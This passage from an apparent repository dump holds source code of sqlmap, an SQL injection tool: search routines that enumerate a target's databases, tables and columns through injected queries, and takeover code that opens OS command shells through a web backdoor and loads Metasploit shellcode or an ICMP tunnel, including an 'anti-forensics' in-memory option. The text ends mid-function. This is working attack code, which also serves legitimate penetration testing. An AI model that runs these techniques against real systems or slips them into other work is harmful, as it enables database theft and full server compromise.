columnExists\nfrom lib.utils.brute import tableExists\nfrom thirdparty import six\n\nclass Search(object):\n    \"\"\"\n    This class defines search functionalities for plugins.\n    \"\"\"\n\n    def __init__(self):\n        pass\n\n    def searchDb(self):\n        foundDbs = []\n        rootQuery = queries[Backend.getIdentifiedDbms()].search_db\n        dbList = conf.db.split(',')\n\n        if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n            dbCond = rootQuery.inband.condition2\n        else:\n            dbCond = rootQuery.inband.condition\n\n        dbConsider, dbCondParam = self.likeOrExact(\"database\")\n\n        for db in dbList:\n            values = []\n            db = safeSQLIdentificatorNaming(db)\n\n            if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n                db = db.upper()\n\n            infoMsg = \"searching database\"\n            if dbConsider == \"1\":\n                infoMsg += \"s LIKE\"\n            infoMsg += \" '%s'\" % unsafeSQLIdentificatorNaming(db)\n            logger.info(infoMsg)\n\n            if conf.excludeSysDbs:\n                exclDbsQuery = \"\".join(\" AND '%s' != %s\" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList)\n                infoMsg = \"skipping system database%s '%s'\" % (\"s\" if len(self.excludeDbsList) > 1 else \"\", \", \".join(db for db in self.excludeDbsList))\n                logger.info(infoMsg)\n            else:\n                exclDbsQuery = \"\"\n\n            dbQuery = \"%s%s\" % (dbCond, dbCondParam)\n            dbQuery = dbQuery % unsafeSQLIdentificatorNaming(db)\n\n            if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n                if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                    query = rootQuery.inband.query2\n                else:\n                    query = rootQuery.inband.query\n\n                query = query % (dbQuery + exclDbsQuery)\n                values = inject.getValue(query, blind=False, time=False)\n\n                if not isNoneValue(values):\n                    values = arrayizeValue(values)\n\n                    for value in values:\n                        value = safeSQLIdentificatorNaming(value)\n                        foundDbs.append(value)\n\n            if not values and isInferenceAvailable() and not conf.direct:\n                infoMsg = \"fetching number of database\"\n                if dbConsider == \"1\":\n                    infoMsg += \"s LIKE\"\n                infoMsg += \" '%s'\" % unsafeSQLIdentificatorNaming(db)\n                logger.info(infoMsg)\n\n                if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                    query = rootQuery.blind.count2\n                else:\n                    query = rootQuery.blind.count\n\n                query = query % (dbQuery + exclDbsQuery)\n                count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                if not isNumPosStrValue(count):\n                    warnMsg = \"no database\"\n                    if dbConsider == \"1\":\n                        warnMsg += \"s LIKE\"\n                    warnMsg += \" '%s' found\" % unsafeSQLIdentificatorNaming(db)\n                    logger.warning(warnMsg)\n\n                    continue\n\n                indexRange = getLimitRange(count)\n\n                for index in indexRange:\n                    if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                        query = rootQuery.blind.query2\n                    else:\n                        query = rootQuery.blind.query\n\n                    query = query % (dbQuery + exclDbsQuery)\n                    query = agent.limitQuery(index, query, dbCond)\n\n                    value = unArrayizeValue(inject.getValue(query, union=False, error=False))\n                    value = safeSQLIdentificatorNaming(value)\n                    foundDbs.append(value)\n\n        conf.dumper.lister(\"found databases\", foundDbs)\n\n    def searchTable(self):\n        bruteForce = False\n\n        if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n            errMsg = \"information_schema not available, \"\n            errMsg += \"back-end DBMS is MySQL < 5.0\"\n            bruteForce = True\n\n        if bruteForce:\n            message = \"do you want to use common table existence check? %s\" % (\"[Y/n/q]\" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else \"[y/N/q]\")\n            choice = readInput(message, default='Y' if 'Y' in message else 'N').upper()\n\n            if choice == 'N':\n                return\n            elif choice == 'Q':\n                raise SqlmapUserQuitException\n            else:\n                regex = '|'.join(conf.tbl.split(','))\n                return tableExists(paths.COMMON_TABLES, regex)\n\n        foundTbls = {}\n        tblList = conf.tbl.split(',')\n        rootQuery = queries[Backend.getIdentifiedDbms()].search_table\n        tblCond = rootQuery.inband.condition\n        dbCond = rootQuery.inband.condition2\n        tblConsider, tblCondParam = self.likeOrExact(\"table\")\n\n        for tbl in tblList:\n            values = []\n            tbl = safeSQLIdentificatorNaming(tbl, True)\n\n            if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n                tbl = tbl.upper()\n                conf.db = conf.db.upper() if conf.db else conf.db\n\n            infoMsg = \"searching table\"\n            if tblConsider == '1':\n                infoMsg += \"s LIKE\"\n            infoMsg += \" '%s'\" % unsafeSQLIdentificatorNaming(tbl)\n\n            if conf.db == CURRENT_DB:\n                conf.db = self.getCurrentDb()\n\n            if dbCond and conf.db:\n                _ = conf.db.split(',')\n                whereDbsQuery = \" AND (\" + \" OR \".join(\"%s = '%s'\" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + \")\"\n                infoMsg += \" for database%s '%s'\" % (\"s\" if len(_) > 1 else \"\", \", \".join(db for db in _))\n            elif conf.excludeSysDbs:\n                whereDbsQuery = \"\".join(\" AND '%s' != %s\" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList)\n                msg = \"skipping system database%s '%s'\" % (\"s\" if len(self.excludeDbsList) > 1 else \"\", \", \".join(db for db in self.excludeDbsList))\n                logger.info(msg)\n            else:\n                whereDbsQuery = \"\"\n\n            if dbCond and conf.exclude:\n                whereDbsQuery += \" AND %s NOT LIKE '%s'\" % (dbCond, re.sub(r\"\\.[*+]\", '%', conf.exclude._original))\n\n            logger.info(infoMsg)\n\n            tblQuery = \"%s%s\" % (tblCond, tblCondParam)\n            tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl)\n\n            if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n                query = rootQuery.inband.query\n\n                query = query % (tblQuery + whereDbsQuery)\n                values = inject.getValue(query, blind=False, time=False)\n\n                if values and Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):\n                    newValues = []\n\n                    if isinstance(values, six.string_types):\n                        values = [values]\n                    for value in values:\n                        dbName = \"SQLite\" if Backend.isDbms(DBMS.SQLITE) else \"Firebird\"\n                        newValues.append([\"%s%s\" % (dbName, METADB_SUFFIX), value])\n\n                    values = newValues\n\n                for foundDb, foundTbl in filterPairValues(values):\n                    foundDb = safeSQLIdentificatorNaming(foundDb)\n                    foundTbl = safeSQLIdentificatorNaming(foundTbl, True)\n\n                    if foundDb is None or foundTbl is None:\n                        continue\n\n                    if foundDb in foundTbls:\n                        foundTbls[foundDb].append(foundTbl)\n                    else:\n                        foundTbls[foundDb] = [foundTbl]\n\n            if not values and isInferenceAvailable() and not conf.direct:\n                if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD):\n                    if len(whereDbsQuery) == 0:\n                        infoMsg = \"fetching number of databases with table\"\n                        if tblConsider == \"1\":\n                            infoMsg += \"s LIKE\"\n                        infoMsg += \" '%s'\" % unsafeSQLIdentificatorNaming(tbl)\n                        logger.info(infoMsg)\n\n                        query = rootQuery.blind.count\n                        query = query % (tblQuery + whereDbsQuery)\n                        count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                        if not isNumPosStrValue(count):\n                            warnMsg = \"no databases have table\"\n                            if tblConsider == \"1\":\n                                warnMsg += \"s LIKE\"\n                            warnMsg += \" '%s'\" % unsafeSQLIdentificatorNaming(tbl)\n                            logger.warning(warnMsg)\n\n                            continue\n\n                        indexRange = getLimitRange(count)\n\n                        for index in indexRange:\n                            query = rootQuery.blind.query\n                            query = query % (tblQuery + whereDbsQuery)\n                            query = agent.limitQuery(index, query)\n\n                            foundDb = unArrayizeValue(inject.getValue(query, union=False, error=False))\n                            foundDb = safeSQLIdentificatorNaming(foundDb)\n\n                            if foundDb not in foundTbls:\n                                foundTbls[foundDb] = []\n\n                            if tblConsider == \"2\":\n                                foundTbls[foundDb].append(tbl)\n\n                        if tblConsider == \"2\":\n                            continue\n                    else:\n                        for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),):\n                            db = safeSQLIdentificatorNaming(db)\n                            if db not in foundTbls:\n                                foundTbls[db] = []\n                else:\n                    dbName = \"SQLite\" if Backend.isDbms(DBMS.SQLITE) else \"Firebird\"\n                    foundTbls[\"%s%s\" % (dbName, METADB_SUFFIX)] = []\n\n                for db in foundTbls:\n                    db = safeSQLIdentificatorNaming(db)\n\n                    infoMsg = \"fetching number of table\"\n                    if tblConsider == \"1\":\n                        infoMsg += \"s LIKE\"\n                    infoMsg += \" '%s' in database '%s'\" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db))\n                    logger.info(infoMsg)\n\n                    query = rootQuery.blind.count2\n                    if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD):\n                        query = query % unsafeSQLIdentificatorNaming(db)\n                    query += \" AND %s\" % tblQuery\n\n                    count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                    if not isNumPosStrValue(count):\n                        warnMsg = \"no table\"\n                        if tblConsider == \"1\":\n                            warnMsg += \"s LIKE\"\n                        warnMsg += \" '%s' \" % unsafeSQLIdentificatorNaming(tbl)\n                        warnMsg += \"in database '%s'\" % unsafeSQLIdentificatorNaming(db)\n                        logger.warning(warnMsg)\n\n                        continue\n\n                    indexRange = getLimitRange(count)\n\n                    for index in indexRange:\n                        query = rootQuery.blind.query2\n\n                        if \" ORDER BY \" in query:\n                            query = query.replace(\" ORDER BY \", \"%s ORDER BY \" % (\" AND %s\" % tblQuery))\n                        elif query.endswith(\"'%s')\"):\n                            query = query[:-1] + \" AND %s)\" % tblQuery\n                        else:\n                            query += \" AND %s\" % tblQuery\n\n                        if Backend.isDbms(DBMS.FIREBIRD):\n                            query = safeStringFormat(query, index)\n\n                        if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD):\n                            query = safeStringFormat(query, unsafeSQLIdentificatorNaming(db))\n\n                        if not Backend.isDbms(DBMS.FIREBIRD):\n                            query = agent.limitQuery(index, query)\n\n                        foundTbl = unArrayizeValue(inject.getValue(query, union=False, error=False))\n                        if not isNoneValue(foundTbl):\n                            kb.hintValue = foundTbl\n                            foundTbl = safeSQLIdentificatorNaming(foundTbl, True)\n                            foundTbls[db].append(foundTbl)\n\n        for db in list(foundTbls.keys()):\n            if isNoneValue(foundTbls[db]):\n                del foundTbls[db]\n\n        if not foundTbls:\n            warnMsg = \"no databases contain any of the provided tables\"\n            logger.warning(warnMsg)\n            return\n\n        conf.dumper.dbTables(foundTbls)\n        self.dumpFoundTables(foundTbls)\n\n    def searchColumn(self):\n        bruteForce = False\n\n        self.forceDbmsEnum()\n\n        if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n            errMsg = \"information_schema not available, \"\n            errMsg += \"back-end DBMS is MySQL < 5.0\"\n            bruteForce = True\n\n        if bruteForce:\n            message = \"do you want to use common column existence check? %s\" % (\"[Y/n/q]\" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else \"[y/N/q]\")\n            choice = readInput(message, default='Y' if 'Y' in message else 'N').upper()\n\n            if choice == 'N':\n                return\n            elif choice == 'Q':\n                raise SqlmapUserQuitException\n            else:\n                regex = '|'.join(conf.col.split(','))\n                conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex))\n\n                message = \"do you want to dump entries? [Y/n] \"\n\n                if readInput(message, default='Y', boolean=True):\n                    self.dumpAll()\n\n                return\n\n        rootQuery = queries[Backend.getIdentifiedDbms()].search_column\n        foundCols = {}\n        dbs = {}\n        whereDbsQuery = \"\"\n        whereTblsQuery = \"\"\n        infoMsgTbl = \"\"\n        infoMsgDb = \"\"\n        colList = conf.col.split(',')\n\n        if conf.exclude:\n            colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]\n\n        origTbl = conf.tbl\n        origDb = conf.db\n        colCond = rootQuery.inband.condition\n        dbCond = rootQuery.inband.condition2\n        tblCond = rootQuery.inband.condition3\n        colConsider, colCondParam = self.likeOrExact(\"column\")\n\n        for column in colList:\n            values = []\n            column = safeSQLIdentificatorNaming(column)\n            conf.db = origDb\n            conf.tbl = origTbl\n\n            if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n                column = column.upper()\n                conf.db = conf.db.upper() if conf.db else conf.db\n                conf.tbl = conf.tbl.upper() if conf.tbl else conf.tbl\n\n            infoMsg = \"searching column\"\n            if colConsider == \"1\":\n                infoMsg += \"s LIKE\"\n            infoMsg += \" '%s'\" % unsafeSQLIdentificatorNaming(column)\n\n            foundCols[column] = {}\n\n            if tblCond:\n                if conf.tbl:\n                    tbls = conf.tbl.split(',')\n                    if conf.exclude:\n                        tbls = [_ for _ in tbls if re.search(conf.exclude, _, re.I) is None]\n                    whereTblsQuery = \" AND (\" + \" OR \".join(\"%s = '%s'\" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in tbls) + \")\"\n                    infoMsgTbl = \" for table%s '%s'\" % (\"s\" if len(tbls) > 1 else \"\", \", \".join(unsafeSQLIdentificatorNaming(tbl) for tbl in tbls))\n\n            if conf.db == CURRENT_DB:\n                conf.db = self.getCurrentDb()\n\n            if dbCond:\n                if conf.db:\n                    _ = conf.db.split(',')\n                    whereDbsQuery = \" AND (\" + \" OR \".join(\"%s = '%s'\" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + \")\"\n                    infoMsgDb = \" in database%s '%s'\" % (\"s\" if len(_) > 1 else \"\", \", \".join(unsafeSQLIdentificatorNaming(db) for db in _))\n                elif conf.excludeSysDbs:\n                    whereDbsQuery = \"\".join(\" AND %s != '%s'\" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList)\n                    msg = \"skipping system database%s '%s'\" % (\"s\" if len(self.excludeDbsList) > 1 else \"\", \", \".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList))\n                    logger.info(msg)\n                else:\n                    infoMsgDb = \" across all databases\"\n\n                if conf.exclude:\n                    whereDbsQuery += \" AND %s NOT LIKE '%s'\" % (dbCond, re.sub(r\"\\.[*+]\", '%', conf.exclude._original))\n\n            logger.info(\"%s%s%s\" % (infoMsg, infoMsgTbl, infoMsgDb))\n\n            colQuery = \"%s%s\" % (colCond, colCondParam)\n            colQuery = colQuery % unsafeSQLIdentificatorNaming(column)\n\n            if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n                if not all((conf.db, conf.tbl)):\n                    # Enumerate tables containing the column provided if\n                    # either of database(s) or table(s) is not provided\n                    query = rootQuery.inband.query\n                    query = query % (colQuery + whereDbsQuery + whereTblsQuery)\n                    values = inject.getValue(query, blind=False, time=False)\n                else:\n                    # Assume provided databases' tables contain the\n                    # column(s) provided\n                    values = []\n\n                    for db in conf.db.split(','):\n                        for tbl in conf.tbl.split(','):\n                            values.append([safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(tbl, True)])\n\n                for db, tbl in filterPairValues(values):\n                    db = safeSQLIdentificatorNaming(db)\n                    tbls = tbl.split(',') if not isNoneValue(tbl) else []\n\n                    for tbl in tbls:\n                        tbl = safeSQLIdentificatorNaming(tbl, True)\n\n                        if db is None or tbl is None:\n                            continue\n\n                        conf.db = db\n                        conf.tbl = tbl\n                        conf.col = column\n\n                        self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)\n\n                        if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]:\n                            if db not in dbs:\n                                dbs[db] = {}\n\n                            if tbl not in dbs[db]:\n                                dbs[db][tbl] = {}\n\n                            dbs[db][tbl].update(kb.data.cachedColumns[db][tbl])\n\n                            if db in foundCols[column]:\n                                foundCols[column][db].append(tbl)\n                            else:\n                                foundCols[column][db] = [tbl]\n\n                        kb.data.cachedColumns = {}\n\n            if not values and isInferenceAvailable() and not conf.direct:\n                if not conf.db:\n                    infoMsg = \"fetching number of databases with tables containing column\"\n                    if colConsider == \"1\":\n                        infoMsg += \"s LIKE\"\n                    infoMsg += \" '%s'\" % unsafeSQLIdentificatorNaming(column)\n                    logger.info(\"%s%s%s\" % (infoMsg, infoMsgTbl, infoMsgDb))\n\n                    query = rootQuery.blind.count\n                    query = query % (colQuery + whereDbsQuery + whereTblsQuery)\n                    count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                    if not isNumPosStrValue(count):\n                        warnMsg = \"no databases have tables containing column\"\n                        if colConsider == \"1\":\n                            warnMsg += \"s LIKE\"\n                        warnMsg += \" '%s'\" % unsafeSQLIdentificatorNaming(column)\n                        logger.warning(\"%s%s\" % (warnMsg, infoMsgTbl))\n\n                        continue\n\n                    indexRange = getLimitRange(count)\n\n                    for index in indexRange:\n                        query = rootQuery.blind.query\n                        query = query % (colQuery + whereDbsQuery + whereTblsQuery)\n                        query = agent.limitQuery(index, query)\n\n                        db = unArrayizeValue(inject.getValue(query, union=False, error=False))\n                        db = safeSQLIdentificatorNaming(db)\n\n                        if db not in dbs:\n                            dbs[db] = {}\n\n                        if db not in foundCols[column]:\n                            foundCols[column][db] = []\n                else:\n                    for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),):\n                        db = safeSQLIdentificatorNaming(db)\n                        if db not in foundCols[column]:\n                            foundCols[column][db] = []\n\n                origDb = conf.db\n                origTbl = conf.tbl\n\n                for column, dbData in foundCols.items():\n                    colQuery = \"%s%s\" % (colCond, colCondParam)\n                    colQuery = colQuery % unsafeSQLIdentificatorNaming(column)\n\n                    for db in dbData:\n                        conf.db = origDb\n                        conf.tbl = origTbl\n\n                        infoMsg = \"fetching number of tables containing column\"\n                        if colConsider == \"1\":\n                            infoMsg += \"s LIKE\"\n                        infoMsg += \" '%s' in database '%s'\" % (unsafeSQLIdentificatorNaming(column), unsafeSQLIdentificatorNaming(db))\n                        logger.info(infoMsg)\n\n                        query = rootQuery.blind.count2\n                        if not re.search(r\"(?i)%s\\Z\" % METADB_SUFFIX, db or \"\"):\n                            query = query % unsafeSQLIdentificatorNaming(db)\n                            query += \" AND %s\" % colQuery\n                        else:\n                            query = query % colQuery\n\n                        query += whereTblsQuery\n\n                        count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                        if not isNumPosStrValue(count):\n                            warnMsg = \"no tables contain column\"\n                            if colConsider == \"1\":\n                                warnMsg += \"s LIKE\"\n                            warnMsg += \" '%s' \" % unsafeSQLIdentificatorNaming(column)\n                            warnMsg += \"in database '%s'\" % unsafeSQLIdentificatorNaming(db)\n                            logger.warning(warnMsg)\n\n                            continue\n\n                        indexRange = getLimitRange(count)\n\n                        for index in indexRange:\n                            query = rootQuery.blind.query2\n\n                            if re.search(r\"(?i)%s\\Z\" % METADB_SUFFIX, db or \"\"):\n                                query = query % (colQuery + whereTblsQuery)\n                            elif query.endswith(\"'%s')\"):\n                                query = query[:-1] + \" AND %s)\" % (colQuery + whereTblsQuery)\n                            elif \" ORDER BY \" in query:\n                                query = query.replace(\" ORDER BY \", \" AND %s ORDER BY \" % (colQuery + whereTblsQuery))\n                            else:\n                                query += \" AND %s\" % (colQuery + whereTblsQuery)\n\n                            query = safeStringFormat(query, unsafeSQLIdentificatorNaming(db))\n                            query = agent.limitQuery(index, query)\n\n                            tbl = unArrayizeValue(inject.getValue(query, union=False, error=False))\n                            kb.hintValue = tbl\n\n                            tbl = safeSQLIdentificatorNaming(tbl, True)\n\n                            conf.db = db\n                            conf.tbl = tbl\n                            conf.col = column\n\n                            self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)\n\n                            if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]:\n                                if db not in dbs:\n                                    dbs[db] = {}\n\n                                if tbl not in dbs[db]:\n                                    dbs[db][tbl] = {}\n\n                                dbs[db][tbl].update(kb.data.cachedColumns[db][tbl])\n\n                            kb.data.cachedColumns = {}\n\n                            if db in foundCols[column]:\n                                foundCols[column][db].append(tbl)\n                            else:\n                                foundCols[column][db] = [tbl]\n\n        if dbs:\n            conf.dumper.dbColumns(foundCols, colConsider, dbs)\n            self.dumpFoundColumn(dbs, foundCols, colConsider)\n        else:\n            warnMsg = \"no databases have tables containing any of the \"\n            warnMsg += \"provided columns\"\n            logger.warning(warnMsg)\n\n    def search(self):\n        if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n            for item in ('db', 'tbl', 'col'):\n                if getattr(conf, item, None):\n                    setattr(conf, item, getattr(conf, item).upper())\n\n        if conf.col:\n            self.searchColumn()\n        elif conf.tbl:\n            self.searchTable()\n        elif conf.db:\n            self.searchDb()\n        else:\n            errMsg = \"missing parameter, provide -D, -T or -C along \"\n            errMsg += \"with --search\"\n            raise SqlmapMissingMandatoryOptionException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/generic/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import Backend\nfrom lib.core.convert import getBytes\nfrom lib.core.data import conf\nfrom lib.core.enums import DBMS\nfrom lib.core.exception import SqlmapUndefinedMethod\n\nclass Syntax(object):\n    \"\"\"\n    This class defines generic syntax functionalities for plugins.\n    \"\"\"\n\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def _escape(expression, quote=True, escaper=None):\n        retVal = expression\n\n        if quote:\n            for item in re.findall(r\"'[^']*'+\", expression):\n                original = item[1:-1]\n                if original:\n                    if Backend.isDbms(DBMS.SQLITE) and \"X%s\" % item in expression:\n                        continue\n                    if re.search(r\"\\[(SLEEPTIME|RAND)\", original) is None:  # e.g. '[SLEEPTIME]' marker\n                        replacement = escaper(original) if not conf.noEscape else original\n\n                        if replacement != original:\n                            retVal = retVal.replace(item, replacement)\n                        elif len(original) != len(getBytes(original)) and \"n'%s'\" % original not in retVal and Backend.getDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.ORACLE, DBMS.MSSQL):\n                            retVal = retVal.replace(\"'%s'\" % original, \"n'%s'\" % original)\n        else:\n            retVal = escaper(expression)\n\n        return retVal\n\n    @staticmethod\n    def escape(expression, quote=True):\n        errMsg = \"'escape' method must be defined \"\n        errMsg += \"inside the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/generic/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.common import Backend\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import isDigit\nfrom lib.core.common import isStackingAvailable\nfrom lib.core.common import openFile\nfrom lib.core.common import readInput\nfrom lib.core.common import runningAsAdmin\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import OS\nfrom lib.core.exception import SqlmapFilePathException\nfrom lib.core.exception import SqlmapMissingDependence\nfrom lib.core.exception import SqlmapMissingMandatoryOptionException\nfrom lib.core.exception import SqlmapMissingPrivileges\nfrom lib.core.exception import SqlmapNotVulnerableException\nfrom lib.core.exception import SqlmapSystemException\nfrom lib.core.exception import SqlmapUndefinedMethod\nfrom lib.core.exception import SqlmapUnsupportedDBMSException\nfrom lib.takeover.abstraction import Abstraction\nfrom lib.takeover.icmpsh import ICMPsh\nfrom lib.takeover.metasploit import Metasploit\nfrom lib.takeover.registry import Registry\n\nclass Takeover(Abstraction, Metasploit, ICMPsh, Registry):\n    \"\"\"\n    This class defines generic OS takeover functionalities for plugins.\n    \"\"\"\n\n    def __init__(self):\n        self.cmdTblName = (\"%soutput\" % conf.tablePrefix)\n        self.tblField = \"data\"\n\n        Abstraction.__init__(self)\n\n    def osCmd(self):\n        if isStackingAvailable() or conf.direct:\n            web = False\n        elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):\n            infoMsg = \"going to use a web backdoor for command execution\"\n            logger.info(infoMsg)\n\n            web = True\n        else:\n            errMsg = \"unable to execute operating system commands via \"\n            errMsg += \"the back-end DBMS\"\n            raise SqlmapNotVulnerableException(errMsg)\n\n        self.getRemoteTempPath()\n        self.initEnv(web=web)\n\n        if not web or (web and self.webBackdoorUrl is not None):\n            self.runCmd(conf.osCmd)\n\n        if not conf.osShell and not conf.osPwn and not conf.cleanup:\n            self.cleanup(web=web)\n\n    def osShell(self):\n        if isStackingAvailable() or conf.direct:\n            web = False\n        elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):\n            infoMsg = \"going to use a web backdoor for command prompt\"\n            logger.info(infoMsg)\n\n            web = True\n        else:\n            errMsg = \"unable to prompt for an interactive operating \"\n            errMsg += \"system shell via the back-end DBMS because \"\n            errMsg += \"stacked queries SQL injection is not supported\"\n            raise SqlmapNotVulnerableException(errMsg)\n\n        self.getRemoteTempPath()\n\n        try:\n            self.initEnv(web=web)\n        except SqlmapFilePathException:\n            if not web and not conf.direct:\n                infoMsg = \"falling back to web backdoor method...\"\n                logger.info(infoMsg)\n\n                web = True\n                kb.udfFail = True\n\n                self.initEnv(web=web)\n            else:\n                raise\n\n        if not web or (web and self.webBackdoorUrl is not None):\n            self.shell()\n\n        if not conf.osPwn and not conf.cleanup:\n            self.cleanup(web=web)\n\n    def osPwn(self):\n        goUdf = False\n        fallbackToWeb = False\n        setupSuccess = False\n\n        self.checkDbmsOs()\n\n        if Backend.isOs(OS.WINDOWS):\n            msg = \"how do you want to establish the tunnel?\"\n            msg += \"\\n[1] TCP: Metasploit Framework (default)\"\n            msg += \"\\n[2] ICMP: icmpsh - ICMP tunneling\"\n\n            while True:\n                tunnel = readInput(msg, default='1')\n\n                if isDigit(tunnel) and int(tunnel) in (1, 2):\n                    tunnel = int(tunnel)\n                    break\n\n                else:\n                    warnMsg = \"invalid value, valid values are '1' and '2'\"\n                    logger.warning(warnMsg)\n        else:\n            tunnel = 1\n\n            debugMsg = \"the tunnel can be established only via TCP when \"\n            debugMsg += \"the back-end DBMS is not Windows\"\n            logger.debug(debugMsg)\n\n        if tunnel == 2:\n            isAdmin = runningAsAdmin()\n\n            if not isAdmin:\n                errMsg = \"you need to run sqlmap as an administrator \"\n                errMsg += \"if you want to establish an out-of-band ICMP \"\n                errMsg += \"tunnel because icmpsh uses raw sockets to \"\n                errMsg += \"sniff and craft ICMP packets\"\n                raise SqlmapMissingPrivileges(errMsg)\n\n            try:\n                __import__(\"impacket\")\n            except ImportError:\n                errMsg = \"sqlmap requires 'python-impacket' third-party library \"\n                errMsg += \"in order to run icmpsh master. You can get it at \"\n                errMsg += \"https://github.com/SecureAuthCorp/impacket\"\n                raise SqlmapMissingDependence(errMsg)\n\n            filename = \"/proc/sys/net/ipv4/icmp_echo_ignore_all\"\n\n            if os.path.exists(filename):\n                try:\n                    with openFile(filename, \"wb\") as f:\n                        f.write(\"1\")\n                except IOError as ex:\n                    errMsg = \"there has been a file opening/writing error \"\n                    errMsg += \"for filename '%s' ('%s')\" % (filename, getSafeExString(ex))\n                    raise SqlmapSystemException(errMsg)\n            else:\n                errMsg = \"you need to disable ICMP replies by your machine \"\n                errMsg += \"system-wide. For example run on Linux/Unix:\\n\"\n                errMsg += \"# sysctl -w net.ipv4.icmp_echo_ignore_all=1\\n\"\n                errMsg += \"If you miss doing that, you will receive \"\n                errMsg += \"information from the database server and it \"\n                errMsg += \"is unlikely to receive commands sent from you\"\n                logger.error(errMsg)\n\n            if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):\n                self.sysUdfs.pop(\"sys_bineval\")\n\n        self.getRemoteTempPath()\n\n        if isStackingAvailable() or conf.direct:\n            web = False\n\n            self.initEnv(web=web)\n\n            if tunnel == 1:\n                if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):\n                    msg = \"how do you want to execute the Metasploit shellcode \"\n                    msg += \"on the back-end database underlying operating system?\"\n                    msg += \"\\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)\"\n                    msg += \"\\n[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)\"\n\n                    while True:\n                        choice = readInput(msg, default='1')\n\n                        if isDigit(choice) and int(choice) in (1, 2):\n                            choice = int(choice)\n                            break\n\n                        else:\n                            warnMsg = \"invalid value, valid values are '1' and '2'\"\n                            logger.warning(warnMsg)\n\n                    if choice == 1:\n                        goUdf = True\n\n                if goUdf:\n                    exitfunc = \"thread\"\n                    setupSuccess = True\n                else:\n                    exitfunc = \"process\"\n\n                self.createMsfShellcode(exitfunc=exitfunc, format=\"raw\", extra=\"BufferRegister=EAX\", encode=\"x86/alpha_mixed\")\n\n                if not goUdf:\n                    setupSuccess = self.uploadShellcodeexec(web=web)\n\n                    if setupSuccess is not True:\n                        if Backend.isDbms(DBMS.MYSQL):\n                            fallbackToWeb = True\n                        else:\n                            msg = \"unable to mount the operating system takeover\"\n                            